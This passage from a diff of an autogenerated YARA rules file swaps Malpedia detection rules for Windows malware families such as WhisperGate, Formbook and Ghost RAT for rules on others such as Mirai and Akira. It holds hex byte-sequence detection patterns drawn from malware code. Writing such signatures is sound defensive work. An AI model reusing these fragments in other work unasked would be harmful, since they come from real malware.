yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6714083d-3e17-55d3-a1f8-8bf9ddb1ef17" + id = "5e7fc19e-d4d3-5751-a42a-778cf2bcb637" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whispergate_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miancha_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "32397ef108fba7d133f035121fc33f6fa3fbeba74a5870442ebf4d00a19bf608" + logic_hash = "1f67b71b2562c78fd331e78fe99dcc1e4206e3c62481b807645f41343dd343bc" score = 75 quality = 75 tags = "FILE" @@ -172554,32 +175306,32 @@ rule MALPEDIA_Win_Whispergate_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89d0 80f92f 0f846b060000 80f95c 0f8462060000 8d50ff } - $sequence_1 = { 0f8409010000 83fb2f 0f8400010000 83fb5c } - $sequence_2 = { f6044840 0f8448ffffff 397dcc 7275 8b45d0 85c0 756e } - $sequence_3 = { 53 31c0 0fa2 85c0 0f84db000000 } - $sequence_4 = { 85ed 75d3 8b542420 8b742424 } - $sequence_5 = { 55 57 56 53 81ec2c010000 8b842440010000 85c0 } - $sequence_6 = { 75e8 890424 e8???????? 89c7 8b44241c } - $sequence_7 = { 56 53 83ec10 8b742420 813e???????? 740e } - $sequence_8 = { e9???????? 837dd427 0f84e4000000 83c001 } - $sequence_9 = { 83c001 85c9 751e 83fa2a 7444 83fa3f 743f } + $sequence_0 = { 7412 8d542418 52 ff15???????? } + $sequence_1 = { 6803000080 ff15???????? 85c0 741f 6a00 } + $sequence_2 = { 8b15???????? 894808 8a0d???????? 89500c 884810 } + $sequence_3 = { 40 50 56 8b35???????? 6a02 6a00 } + $sequence_4 = { 85f6 7412 8d542418 52 ff15???????? 50 } + $sequence_5 = { ff15???????? 50 ffd6 85c0 741a } + $sequence_6 = { 8d542418 52 ff15???????? 50 ffd6 85c0 } + $sequence_7 = { 50 68???????? e8???????? 33f6 83c408 } + $sequence_8 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? } + $sequence_9 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? 89480c } condition: - 7 of them and filesize <114688 + 7 of them and filesize <376832 } -rule MALPEDIA_Win_Dyre_Auto : FILE +rule MALPEDIA_Win_Lowkey_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a2cdb89d-a2b8-54db-b921-a02d048236a7" + id = "16d4ae5f-e38d-570e-962d-91656915c4ac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dyre_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lowkey_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "e9097ad46c004cb1ae831fc1ba01674dc80d073ddf943ce6f2fcdbae48599a8a" + logic_hash = "663feed0bd96ec1d7d11defff75725aca17e4e2539133645562042d15d3f90de" score = 75 quality = 75 tags = "FILE" @@ -172593,40 +175345,34 @@ rule MALPEDIA_Win_Dyre_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6814020000 e8???????? 59 c3 } - $sequence_1 = { e9???????? 68f4010000 ff15???????? 56 } - $sequence_2 = { 7244 6801010000 ff15???????? 8b4d18 663901 } - $sequence_3 = { 7502 c9 c3 33c0 837dfc20 } - $sequence_4 = { 0fb7c8 c1e110 e8???????? 0fb7c0 0bc1 c9 c3 } - $sequence_5 = { 773d 0fbec0 83e857 8ada 2ad9 c1e004 80fb09 } - $sequence_6 = { c1fa02 8b1496 83e103 c1e103 } - $sequence_7 = { 41 3bc8 7cf4 83f903 } - $sequence_8 = { 57 4883ec20 4032ff 488bda 8bf1 4885d2 } - $sequence_9 = { 488bc8 ff15???????? 85c0 7455 4c8d442434 } - $sequence_10 = { 488bcb e8???????? 4c8d5e01 41b8f7ffffff 6666660f1f840000000000 488bcf 418d4008 } - $sequence_11 = { 4433c0 418bc5 23c6 33c8 418bc1 4403c1 } - $sequence_12 = { 663907 7530 8b4604 394704 7528 8b4608 394708 } - $sequence_13 = { 498d43e8 33ff 488bf2 498943d8 498d4318 488bd9 488bd1 } - $sequence_14 = { 440fb69c249f000000 0fb68c249d000000 0fb694249c000000 440fb694249b000000 } - $sequence_15 = { 488bcb e8???????? 85c0 750d 33c0 488b5c2430 } + $sequence_0 = { 482be0 488b05???????? 4833c4 48898520200000 33d2 c74590636d642e } + $sequence_1 = { 488d3547ed0100 eb16 488b3b 4885ff 740a } + $sequence_2 = { 0f85d7feffff e9???????? b966000000 66894c2435 e9???????? 488d15fa230200 488d8d70010000 } + $sequence_3 = { b868000000 6689442435 eb49 488d1517250200 488d8d70010000 ff15???????? 85c0 } + $sequence_4 = { 4833c4 4889842490040000 8bfa 488bd9 4885c9 } + $sequence_5 = { 85c0 0f84bffeffff b865000000 895c2438 4c8d8570090000 6689442435 488d542430 } + $sequence_6 = { ff15???????? e9???????? b9d3000000 663bc1 7551 4c3935???????? 7414 } + $sequence_7 = { c3 4057 4883ec20 488d3d7b2d0100 48393d???????? 742b } + $sequence_8 = { 5e 5b c3 488bcb ff15???????? 4885c0 7504 } + $sequence_9 = { eb87 4055 53 57 488dac2470dfffff b890210000 } condition: - 7 of them and filesize <590848 + 7 of them and filesize <643072 } -rule MALPEDIA_Win_R980_Auto : FILE +rule MALPEDIA_Win_Pss_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5cd23ce7-fde9-586e-b7d0-c68d0d4730a5" + id = "c85e1f97-adb5-5a29-88aa-4e9dab9b1814" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.r980_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pss_auto.yar#L1-L136" license_url = "N/A" - logic_hash = "6631f2c285d8397109ba8d7d2192a7dc1832567dbf3b5dac3dd0d91311ae325e" + logic_hash = "3fa2b0cf1b29b7abf02331e25c131d124a839f7a317f2ebb6c59c1c9547e53c0" score = 75 - quality = 45 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -172638,32 +175384,35 @@ rule MALPEDIA_Win_R980_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 8d4dd4 e8???????? 837de810 8d45d4 53 0f4345d4 } - $sequence_1 = { e8???????? 56 8b08 8b01 ff5070 56 50 } - $sequence_2 = { 8d4dbc e8???????? 8d4dd4 e8???????? 8d4da4 e8???????? 8b4df4 } - $sequence_3 = { 85c0 7409 ff7608 50 e8???????? c7460800000000 c7460400000000 } - $sequence_4 = { 50 e8???????? 8bce e8???????? 8b4d1c 83c418 } - $sequence_5 = { 8bc7 f00fc14104 7515 8b01 ff10 8b4db4 8bc7 } - $sequence_6 = { ff4654 837e5440 750c c7465400000000 e8???????? 8b4658 83f8f8 } - $sequence_7 = { e8???????? 83ec18 8d8424c0000000 8bcc 50 e8???????? e9???????? } - $sequence_8 = { 8bc8 e8???????? 33c9 894ddc 8b448dc8 0f57c0 41 } - $sequence_9 = { c745fc00000000 8b30 8d45ec 50 e8???????? 83c404 8d4dec } + $sequence_0 = { 8d48fe e8???????? e9???????? 83f811 } + $sequence_1 = { 7437 ff15???????? 3de5030000 752a } + $sequence_2 = { ff15???????? 83ceff 3bc6 7504 } + $sequence_3 = { 5e 5b 0f42ca 85c0 0f45c8 } + $sequence_4 = { 0fb619 0fb6c0 eb17 81fb00010000 7313 8a87a4f10110 } + $sequence_5 = { 8d542418 8bce e8???????? 59 59 } + $sequence_6 = { 8bf9 46 85ff 744f 833fff 7410 ff37 } + $sequence_7 = { 0fb6c0 5f 5e 5b c9 } + $sequence_8 = { 488d4c2428 e8???????? 90 4c8d05b3b70000 488bd0 488d0db1610100 } + $sequence_9 = { ff15???????? b001 eb25 e8???????? } + $sequence_10 = { e8???????? 90 4c8d05d3b50000 488bd0 } + $sequence_11 = { 488bcb e8???????? e9???????? ba80000000 488bcb } + $sequence_12 = { 488b4de7 e8???????? 48c745ff07000000 48897df7 } condition: - 7 of them and filesize <3178496 + 7 of them and filesize <421888 } -rule MALPEDIA_Win_Formbook_Auto : FILE +rule MALPEDIA_Win_Lethic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5884ccaf-7c22-509b-b936-d78ce47dc38a" + id = "89881c0c-ddd2-5773-9144-03db6590b3cc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.formbook_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lethic_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "1856083163db4d487acf8602c72ba34a2aeebb6a0e8b028efa10c5ca24fd0c49" + logic_hash = "3125ec39e54752d0947a08a6149f6c0dbb19d9ccd38ebef90b278b6227c3cc5c" score = 75 quality = 75 tags = "FILE" @@ -172677,34 +175426,34 @@ rule MALPEDIA_Win_Formbook_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5b 5f 5e 8be5 5d c3 8d0476 } - $sequence_1 = { 6a0d 8d8500fcffff 50 56 e8???????? 8d8d00fcffff 51 } - $sequence_2 = { 56 e8???????? 8d4df4 51 56 e8???????? 8d55e4 } - $sequence_3 = { c3 3c04 752b 8b7518 8b0e 8b5510 8b7d14 } - $sequence_4 = { 56 e8???????? 83c418 395df8 0f85a0000000 8b7d18 395f10 } - $sequence_5 = { c745fc01000000 e8???????? 6a14 8d4dec 51 50 } - $sequence_6 = { e8???????? 83c428 8906 85c0 75a8 5f 33c0 } - $sequence_7 = { 56 e8???????? 6a03 ba5c000000 57 56 66891446 } - $sequence_8 = { 3b75d0 72c0 8d55f8 52 e8???????? } - $sequence_9 = { 8d8df6f7ffff 51 c745fc00000000 668985f4f7ffff e8???????? 8b7508 } + $sequence_0 = { 837df400 7507 33c0 e9???????? 8b55f4 8b4218 } + $sequence_1 = { 33c0 e9???????? 8b45fc 8b4d10 894804 } + $sequence_2 = { 50 8b4dfc 83c108 51 8b55f4 } + $sequence_3 = { 8b45fc 8b08 894dfc ebec 8b55fc } + $sequence_4 = { eb42 6a10 8b55fc 83c208 52 } + $sequence_5 = { ebec 8b55fc 8b45f4 8b08 890a 8b55fc } + $sequence_6 = { 8945fc c745f801000000 837dfc00 7507 33c0 e9???????? 8b45fc } + $sequence_7 = { 3b55f8 7411 8b45fc c60000 } + $sequence_8 = { 8b08 890a 8b55fc 8b02 8945fc 8b4df4 51 } + $sequence_9 = { eb42 6a10 8b55fc 83c208 52 8b45fc 8b4818 } condition: - 7 of them and filesize <371712 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Ghost_Rat_Auto : FILE +rule MALPEDIA_Win_Mirai_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a811e919-423f-5da5-9744-a836ad0cfe7b" + id = "81ec826d-82b4-5432-816d-754db384603c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghost_rat_auto.yar#L1-L294" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mirai_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "566fcbf38da6404d1cfb5b85cb33273a727f786f21d6a86dff53a4e450ad50b1" + logic_hash = "141eec0723c6032d1109e3ff4e6c77adfb4c0eb70a7f0ab199e555f3b3d9eb19" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -172716,54 +175465,32 @@ rule MALPEDIA_Win_Ghost_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a01 56 ff15???????? 5e c20800 } - $sequence_1 = { 8bd9 e8???????? 8b4d08 3bc8 } - $sequence_2 = { 8b400c 85c0 7505 a1???????? 50 8bce } - $sequence_3 = { 8be5 5d c20400 894df4 } - $sequence_4 = { 894df4 c745f800000000 df6df4 83ec08 dc0d???????? } - $sequence_5 = { 6a6b 8bce e8???????? 5f } - $sequence_6 = { e8???????? 8b8e549f0000 83c41c 89848e14030000 8b86549f0000 } - $sequence_7 = { 8d7b01 c60396 f3a5 53 8bcd } - $sequence_8 = { 8db714030000 8b06 6aff 50 } - $sequence_9 = { 8b5614 8b02 8b400c 85c0 } - $sequence_10 = { e9???????? 8d45dc 50 681f000200 } - $sequence_11 = { 50 ff15???????? ffb6a8000000 ff15???????? ffb6ac000000 } - $sequence_12 = { 8dbd85feffff f3ab 66ab aa } - $sequence_13 = { 6a00 6a00 c705????????20010000 e8???????? 8b35???????? } - $sequence_14 = { e8???????? 8d85c0feffff 50 57 ff15???????? 8bf8 83ffff } - $sequence_15 = { 83c40c 8d85b8feffff 50 8d85b4fdffff } - $sequence_16 = { 8bce e8???????? 8b4df4 5f b001 5e } - $sequence_17 = { 8bf0 83c40c 46 750b 5f 5e 33c0 } - $sequence_18 = { ff15???????? 6a01 ff7620 ff15???????? 8b4e04 e8???????? } - $sequence_19 = { ff7510 ff75dc ff15???????? 85c0 7507 c745e401000000 834dfcff } - $sequence_20 = { 56 53 e8???????? 83c408 84c0 750b } - $sequence_21 = { 68???????? 50 6802000080 e8???????? 83c41c 5f 5e } - $sequence_22 = { 6a00 50 e8???????? 83c40c ff7508 6a40 ff15???????? } - $sequence_23 = { 8365fc00 ff7508 ff15???????? 40 50 ff15???????? 59 } - $sequence_24 = { 8b4608 8b7e20 8b36 813f6b006500 7406 } - $sequence_25 = { c7014c696272 83e9fc c70161727941 83e9fc } - $sequence_26 = { 813f6b006500 7406 813f4b004500 75e8 } - $sequence_27 = { c7014c6f6164 83e9fc c7014c696272 83e9fc } - $sequence_28 = { 7475 8b45bc 8b08 894db4 } - $sequence_29 = { 8911 eb26 8b45b4 8b4d08 8d540102 } - $sequence_30 = { 8b55dc 8b7a18 8b7220 0375f8 33c9 } - $sequence_31 = { 6bc928 8b9538ffffff 8b8560ffffff 03440a0c 8985fcfeffff } + $sequence_0 = { e8???????? 83c408 85c0 7535 8b742408 50 68???????? } + $sequence_1 = { 8b8d48feffff e8???????? 8d4db0 e8???????? 8365fc00 83a578feffff00 8d8554feffff } + $sequence_2 = { e8???????? 83c40c 5d c3 8b5510 8b450c 8b4904 } + $sequence_3 = { 8bf3 c1ee18 334cb500 8b2d???????? 0fb6f2 334cb500 8b35???????? } + $sequence_4 = { 8bcd e8???????? 8bc8 e8???????? 8b10 8b12 6a5c } + $sequence_5 = { e8???????? 8b54244c 56 53 52 53 ff15???????? } + $sequence_6 = { c3 55 8bec 51 51 6a17 68???????? } + $sequence_7 = { c20400 55 8bec 83ec14 894df0 c745f401000000 837df400 } + $sequence_8 = { 8bbcbd00100000 81e70000ff00 33f7 0fb6fd 8bbcbd00100000 81e700ff0000 33f7 } + $sequence_9 = { e8???????? 8365f800 8b45fc c9 c3 55 8bec } condition: - 7 of them and filesize <357376 + 7 of them and filesize <7086080 } -rule MALPEDIA_Win_Azorult_Auto : FILE +rule MALPEDIA_Win_Knot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b51dfae0-9dbd-5fdb-9b21-c42d24abe8fe" + id = "a6e6a5bf-ddf5-50fd-bee4-72bdce46b16d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.azorult_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.knot_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "57462241e7f147f9f02722e7f4f98394823c33b074e00b1372b7118c997d7f9f" + logic_hash = "1eb2f0d25dde1dc340b502f0b94dbb26bfbabe3643f1c7382f79e2ee4892b78f" score = 75 quality = 75 tags = "FILE" @@ -172777,38 +175504,32 @@ rule MALPEDIA_Win_Azorult_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ba???????? 8d45e8 e8???????? 8d45e4 8b55f8 8a543201 } - $sequence_1 = { e8???????? 56 8d85a0fdffff b9???????? } - $sequence_2 = { b9???????? 8b55fc e8???????? 8b859cfdffff e8???????? } - $sequence_3 = { b80f270000 e8???????? 8945f8 8d55f4 8bc3 } - $sequence_4 = { b80f270000 e8???????? 8bf0 b80f270000 } - $sequence_5 = { 7518 56 8b45fc e8???????? 8bc8 8d5301 } - $sequence_6 = { b80f270000 e8???????? 8bd8 b80f270000 } - $sequence_7 = { ba03000000 e8???????? 8d858cfdffff e8???????? } - $sequence_8 = { 7506 ff05???????? 56 e8???????? 59 } - $sequence_9 = { e8???????? 59 8b45f4 40 } - $sequence_10 = { 50 e8???????? 59 8bd8 33c0 } - $sequence_11 = { 85db 7404 8bc3 eb07 } - $sequence_12 = { 011f 59 8bc3 c1e003 01866caf0100 } - $sequence_13 = { 014f18 8b4714 85c0 0f854e010000 } - $sequence_14 = { 014110 5f 5e 5b } - $sequence_15 = { 01590c 8b45f0 014110 5f } + $sequence_0 = { 50 8b8ddcfdffff 51 6a00 6a00 6a01 } + $sequence_1 = { 55 8bec 81ec34010000 6a00 } + $sequence_2 = { 6a18 6a00 6a00 68???????? ff15???????? 8d95f0f9ffff } + $sequence_3 = { ff15???????? 83c408 6a01 6a00 } + $sequence_4 = { 83bdd4fdffff00 7443 8b85d8fdffff 50 8b8ddcfdffff 51 } + $sequence_5 = { 6800000040 8d95e0fdffff 52 ff15???????? } + $sequence_6 = { ff15???????? 8b55ec 52 ff15???????? 8b45e8 50 ff15???????? } + $sequence_7 = { 6a00 6a00 68???????? ff15???????? 8d95f0f9ffff 52 e8???????? } + $sequence_8 = { 52 ff15???????? 85c0 7507 32c0 e9???????? c785d8fdffff00000000 } + $sequence_9 = { 83c408 68???????? 8b8d74f7ffff 51 e8???????? } condition: - 7 of them and filesize <1753088 + 7 of them and filesize <59392 } -rule MALPEDIA_Win_Hikit_Auto : FILE +rule MALPEDIA_Win_Akira_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bd6e764b-576f-54ee-bfa6-5e7a42269dfd" + id = "5047b686-dc46-5a3e-aa74-fc92a34b0f3e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hikit_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.akira_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "dc92a800adf1985c32a4ddd1d9a2bce0a144c5995b6902cad53971cf4e90fb53" + logic_hash = "c1ae7dbc4a382b6e7a49f30242c48e32f0bd119ae1ed5e26b8c812d114457836" score = 75 quality = 75 tags = "FILE" @@ -172822,32 +175543,32 @@ rule MALPEDIA_Win_Hikit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c0 e9???????? 48 8d44244e 48 898424b8000000 48 } - $sequence_1 = { 89442428 48 837c242800 747e 33c0 83f801 7444 } - $sequence_2 = { c7432000000000 48 8b442430 48 83781800 741c 48 } - $sequence_3 = { e8???????? 8bf8 85ff 7408 81ff20a00400 7508 8b06 } - $sequence_4 = { 6a00 50 ff15???????? 85c0 0f84a3000000 33ff } - $sequence_5 = { 8bd5 8bce e8???????? f7d8 1bc0 40 894608 } - $sequence_6 = { 6689046e 8b2d???????? 53 ffd5 56 68???????? 8d4c2410 } - $sequence_7 = { 8d05b2210000 48 89442428 eb0d 48 8b442428 } - $sequence_8 = { 894120 48 8b4c2460 8b44240c 894104 48 8b4c2460 } - $sequence_9 = { 4c 8d442478 baffff1f00 ff15???????? 898424b0000000 83bc24b000000000 7444 } + $sequence_0 = { 8b01 85c0 7e18 ffc8 8901 498b4840 488b11 } + $sequence_1 = { 418bc9 83c902 41f6c108 410f44c9 81e13bffffff 390d???????? 741d } + $sequence_2 = { 90 488b4b60 48894c2430 4885c9 7445 488b5370 4889542440 } + $sequence_3 = { 7cee 488bcb 488b5c2430 4883c420 5f e9???????? 0fb6043b } + $sequence_4 = { ff5208 90 488b4b60 48894c2430 4885c9 7445 488b5370 } + $sequence_5 = { e8???????? 488975d0 488b4dd8 488975d8 48894808 0f1045e0 0f114010 } + $sequence_6 = { 4488443c6e 48ffc7 4883ff0a 72ac 0f57c0 0f118590020000 0f57c9 } + $sequence_7 = { 740a e8???????? 488bd8 eb03 498bdd 49897e18 } + $sequence_8 = { e8???????? 33f6 41897578 49397568 744d 488b0f 40387128 } + $sequence_9 = { c645bf01 4883ef01 75b4 0f2845bf 33ff 4c8d75cf 48837de710 } condition: - 7 of them and filesize <573440 + 7 of them and filesize <1286144 } -rule MALPEDIA_Win_Brambul_Auto : FILE +rule MALPEDIA_Win_Geminiduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fb37501d-8a53-5cc7-864b-a2eff1ebf028" + id = "7571eb47-e456-5ff2-b8bf-b1898ddd8358" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.brambul_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.geminiduke_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "b2fcad7678e1145848466f51e53045ab3d4628142b8e9b03697218392aef0c7d" + logic_hash = "e55c638d52ba8f741e7b2025242401b1531659829b54a8df50edaef39f23c4d8" score = 75 quality = 75 tags = "FILE" @@ -172861,38 +175582,37 @@ rule MALPEDIA_Win_Brambul_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66390a 750c 663908 8dbc5dc4000000 } - $sequence_1 = { d3e0 48 234508 8d0440 } - $sequence_2 = { 83f801 7269 6a08 6a40 ff15???????? 8b542414 } - $sequence_3 = { 8bd9 33ee c1eb14 c1e10c } - $sequence_4 = { c1e311 0bf3 8b5824 03f2 23ee 33e9 } - $sequence_5 = { 6800400000 6a00 ff15???????? 50 ff15???????? 8bd8 } - $sequence_6 = { 6a05 89b5b049ffff 58 8985a849ffff } - $sequence_7 = { 25ffff0000 3bf8 7cc9 8bc6 5f 5e 5d } - $sequence_8 = { 8d54242c c1e902 f3a5 8bc8 8d442470 } - $sequence_9 = { 68???????? ff15???????? 83c408 b804000000 5f 5e 5d } - $sequence_10 = { 8b8c2480010000 89942418010000 8984241c010000 8d942418010000 51 8d84245c010000 } - $sequence_11 = { 8d45e8 50 8bf3 8d85be49ffff 83e31f 83a5b85dffff00 } - $sequence_12 = { 89b404bc000000 83c004 83f840 7cd0 b910000000 } - $sequence_13 = { 8d7c2420 f3ab 8d442424 50 56 53 } - $sequence_14 = { 50 e8???????? 83f8ff 7517 8d4c2410 } - $sequence_15 = { c3 8b442404 c74050f0864000 c7401401000000 } + $sequence_0 = { 51 57 8b7c2410 8b442414 } + $sequence_1 = { 8b7c2410 8b442414 8b4c2418 f3aa } + $sequence_2 = { 6a00 68???????? e8???????? 83c404 50 6801000080 ff15???????? } + $sequence_3 = { 8b4c2418 f3aa 5f 59 } + $sequence_4 = { 03459c 03c8 894ddc 8b45fc } + $sequence_5 = { 034590 8b8d70ffffff c1e907 8b9570ffffff } + $sequence_6 = { 034584 8b8d64ffffff c1e907 8b9564ffffff c1e219 0bca } + $sequence_7 = { 034590 03c8 894dd0 8b45f8 } + $sequence_8 = { f7f3 66894706 8bc2 c1e010 668b4604 33d2 f7f3 } + $sequence_9 = { 0fb6f8 57 6a20 56 e8???????? 83c40c } + $sequence_10 = { 337704 33e8 8b442410 c1ee12 83e601 33ee } + $sequence_11 = { 33d2 f7f3 66894704 8bc2 } + $sequence_12 = { e8???????? d1ee 33f3 c1ee03 337704 33e8 } + $sequence_13 = { 0430 8ad1 80ea0a 80fa05 7705 } + $sequence_14 = { 8a442404 8ac8 80e961 80f919 7703 b001 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Boatlaunch_Auto : FILE +rule MALPEDIA_Win_Crosswalk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "109242da-f9c2-50c8-b49d-1f772a8283fe" + id = "4e86aa0a-7e26-5d10-b3ce-967831f39ceb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boatlaunch_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crosswalk_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "efa924e2b3901352dc645d99e6dd6dafbe8ab78c7c6ccaefe300da9883a180c7" + logic_hash = "c5472d51b6e367a8e5153b183b7c173cc8cbe07eef42b7b5523d361aefdeb08e" score = 75 quality = 75 tags = "FILE" @@ -172906,38 +175626,38 @@ rule MALPEDIA_Win_Boatlaunch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4883611000 4883612800 488d4dd8 48c7c2ffff1f00 4c8d45e0 4c8d4d10 } - $sequence_1 = { e8???????? 8945e4 6a00 ff75e0 } - $sequence_2 = { 2b75ec 0375e4 8b4324 2b45ec 0345e4 } - $sequence_3 = { 488d4df0 e8???????? 48c7c1ffffffff 488d55f0 448bc3 e8???????? 3b8558110000 } - $sequence_4 = { 480375c8 8b4324 2b45c0 480345c8 488945d0 8b5b18 ad } - $sequence_5 = { 85f6 7599 488b0d???????? 33d2 4c8b4500 } - $sequence_6 = { 3b8560110000 7526 488b45d0 0fb730 } - $sequence_7 = { 488d4dd0 48c7c200001000 4c8d45e0 4c8d4d10 e8???????? 3d0b0000c0 7427 } - $sequence_8 = { 50 68ff0f1f00 8d45fc 50 } - $sequence_9 = { 8bfe 49 85c9 75ee } - $sequence_10 = { e8???????? 8bd8 85db 7452 53 } - $sequence_11 = { eb09 8345e802 4b 85db 75af } - $sequence_12 = { 50 e8???????? 3d0b0000c0 7423 6a00 ff75f8 e8???????? } - $sequence_13 = { 5b 5d c3 48894c2408 89542410 4489442418 } - $sequence_14 = { 488b45d8 488d6528 415b 415a 4159 4158 } - $sequence_15 = { 8d5ddc c70318000000 c7430400000000 c7430800000000 c7430c00000000 } + $sequence_0 = { 4885c9 7402 ffd1 b801000000 } + $sequence_1 = { ff15???????? 448bf0 4533c9 4533c0 } + $sequence_2 = { 458bc6 33d2 488bc8 e8???????? 4533c9 } + $sequence_3 = { 458d7ee0 418bd7 ff15???????? 4821742420 } + $sequence_4 = { 4c8bc6 33d2 410fbe00 49ffc0 } + $sequence_5 = { 418bc0 f7e9 03d1 c1fa0b 8bc2 c1e81f 03d0 } + $sequence_6 = { d3ca 03d0 4183ef01 75ef } + $sequence_7 = { 410fbe00 49ffc0 d3ca 03d0 } + $sequence_8 = { 8b45fc 817848f0844100 7409 ff7048 e8???????? } + $sequence_9 = { 6a26 58 0fb60c85c6574100 0fb63485c7574100 8bf9 } + $sequence_10 = { 7403 ff5508 5d c20400 53 8b1d???????? } + $sequence_11 = { 735f 8bc6 8bfe 83e03f c1ff06 6bd830 8b04bd808e4100 } + $sequence_12 = { c1f906 03048d808e4100 eb02 8bc6 80782900 } + $sequence_13 = { 83e801 0f8501010000 c745e0245b4100 8b4508 8bcf 8b7510 } + $sequence_14 = { 